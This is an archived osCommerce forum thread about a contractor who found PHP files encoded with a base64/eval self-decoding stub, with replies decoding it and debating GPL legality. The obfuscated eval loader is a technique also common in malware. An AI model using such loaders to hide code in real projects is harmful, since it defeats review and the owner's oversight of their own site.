<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=2520;eval((base64_decode('JE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO3doaWxlKC0tJE8wME8wME8wMClmZ2V0
cygkTzAwME8wTzAwLDEwMjQpO2ZnZXRzKCRPMDAwTzBPMDAsNDA5Nik7JE9PMDBPMDBPMD0oYmFzZTY0X
2RlY29kZShzdHJ0cihmcmVhZCgkTzAwME8wTzAwLDc0NCksJ1dmZ1pVbmsvQTMrcXc4Rk5SQ2x2YnpyOU
lqU0p0YUhlZHlFbXhoWDJzMG9HN1ZUMU02RGlZS0xjNXVPUXBQNEI9JywnQUJDREVGR0hJSktMTU5PUFF
SU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08w
ME8wME8wKTs=')));return;?>
Is this legal? I dont think it is as osCommerce falls under GNU opensource. And if not legal, what actions can be took to decrypt the code?
Latest News: (loading..)
0
14 replies to this topic
#1
Posted 18 February 2008, 21:16
I just recently was asked to install a couple contributions on an oscommerce site originally set up by another company. Well it turns out the other company encrypted every single page of the cart. And they left this notice on top of everypage:
#2
Posted 18 February 2008, 23:09
If you "decode" that snippit, and alter a few things to make it "easier" to read, you wind up with this:
$file=__FILE__; $line=__LINE__; $110010000=2520; $handle=fopen($file,'rb'); while(--$line)fgets($handle,1024); fgets($handle,4096); $decoded=(base64_decode(strtr(fread($handle,744),'WfgZUnk/A3+qw8FNRClvbzr9IjSJtaHedyEmxhX2s0oG7VT1M6DiYKLc5uOQpP4B=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'))); eval($decoded); return;
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Like this post? "Like" it again over there >
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
Like this post? "Like" it again over there >
#3
Posted 19 February 2008, 18:52
What they have done is not in any sense illegal or against GPL rules.
Provided that they are only encrypting the source code on their own website, which would be useful against hackers, then they've done nothing wrong.
If they encrypt the source code and sell it or distribute it in an encrypted form then that's another matter.
Vger
Provided that they are only encrypting the source code on their own website, which would be useful against hackers, then they've done nothing wrong.
If they encrypt the source code and sell it or distribute it in an encrypted form then that's another matter.
Vger
#4
Posted 19 February 2008, 19:41
Vger, on Feb 19 2008, 12:52 PM, said:
What they have done is not in any sense illegal or against GPL rules.
Provided that they are only encrypting the source code on their own website, which would be useful against hackers, then they've done nothing wrong.
If they encrypt the source code and sell it or distribute it in an encrypted form then that's another matter.
Vger
Provided that they are only encrypting the source code on their own website, which would be useful against hackers, then they've done nothing wrong.
If they encrypt the source code and sell it or distribute it in an encrypted form then that's another matter.
Vger
So if they built the site for someone else for a fee and used it on a domain name other than their own, what would that fall as?
#6
Posted 20 February 2008, 13:32
Quote
So if they built the site for someone else for a fee and used it on a domain name other than their own, what would that fall as?
If someone built the site for you, I would suggest you contact them and demand the un -encoded files from them stating the GPL and explain you will contact the author of the project for further dealings....
the adding of the the text:
This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
might be an issue depending if the file uses osCommerce code or not and if they do, then they need to maintain the copyrights of osC in place and in unaltered form.
cheers,
Peter M
Edited by cannuck1964, 20 February 2008, 13:32.
Peter McGrath
-----------------------------
See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation
-----------------------------
See my Profile (click here) for more information and to contact me for professional osCommerce support that includes SEO development, custom development and security implementation
#8
Posted 23 February 2008, 18:47
Quote
Thanks Peter. Were contacting the original designer to get it reversed
I'm just wondering who this "we" is that you are referring to. Surely you were just paid to add some contribs to this site, presumably by the same people who encrypted it, and your involvement ended when you got paid.
I'm not arguing the rights or wrongs of this particular case, but I will say one thing - if we employed you to work on a site and then you complained on an open Forum about something you didn't like then we'd class it as "biting the hand that feeds you" and you wouldn't get employed by us again.
You may not like that view - but if you want to do paid work for companies then you have to separate your personal feelings from business decisions.
Vger
#9
Posted 24 February 2008, 02:04
Vger, on Feb 23 2008, 12:47 PM, said:
I'm just wondering who this "we" is that you are referring to. Surely you were just paid to add some contribs to this site, presumably by the same people who encrypted it, and your involvement ended when you got paid.
I'm not arguing the rights or wrongs of this particular case, but I will say one thing - if we employed you to work on a site and then you complained on an open Forum about something you didn't like then we'd class it as "biting the hand that feeds you" and you wouldn't get employed by us again.
You may not like that view - but if you want to do paid work for companies then you have to separate your personal feelings from business decisions.
Vger
I'm not arguing the rights or wrongs of this particular case, but I will say one thing - if we employed you to work on a site and then you complained on an open Forum about something you didn't like then we'd class it as "biting the hand that feeds you" and you wouldn't get employed by us again.
You may not like that view - but if you want to do paid work for companies then you have to separate your personal feelings from business decisions.
Vger
Dont know how you would come up with that conclusion. Maybe you have been in that situation before. I for one have never touched this site before, nor have I ever worked with the company that did work to it.
When I say "we" I am refering to the site owner and I. "I" as under "my" suggestion, as I concluded from this forum.
#13
Posted 26 July 2008, 20:49
Both Ion Cube and Zend are PHP encoders that comes with a price. My question wasn't asking about encoding software. I was more interested in the encryption method.
Does anyone know what encryption methods Ion Cube and Zend use?
I looked around and found that MD5 and SHA1 are supported by PHP. Would it be practical to utilize either of those methods to encrypt PHP source code?
Does anyone know what encryption methods Ion Cube and Zend use?
I looked around and found that MD5 and SHA1 are supported by PHP. Would it be practical to utilize either of those methods to encrypt PHP source code?
#14
Posted 26 July 2008, 23:20
Please disregard my question about MD5 and SHA1. After some research, I found that those were hash methods. I suppose it wouldn't be practical to use a hash method to encrypt PHP source code.
At the moment, I am looking into mcrypt which looks more promising... Any suggestion about mcrypt will be appreciated.
At the moment, I am looking into mcrypt which looks more promising... Any suggestion about mcrypt will be appreciated.
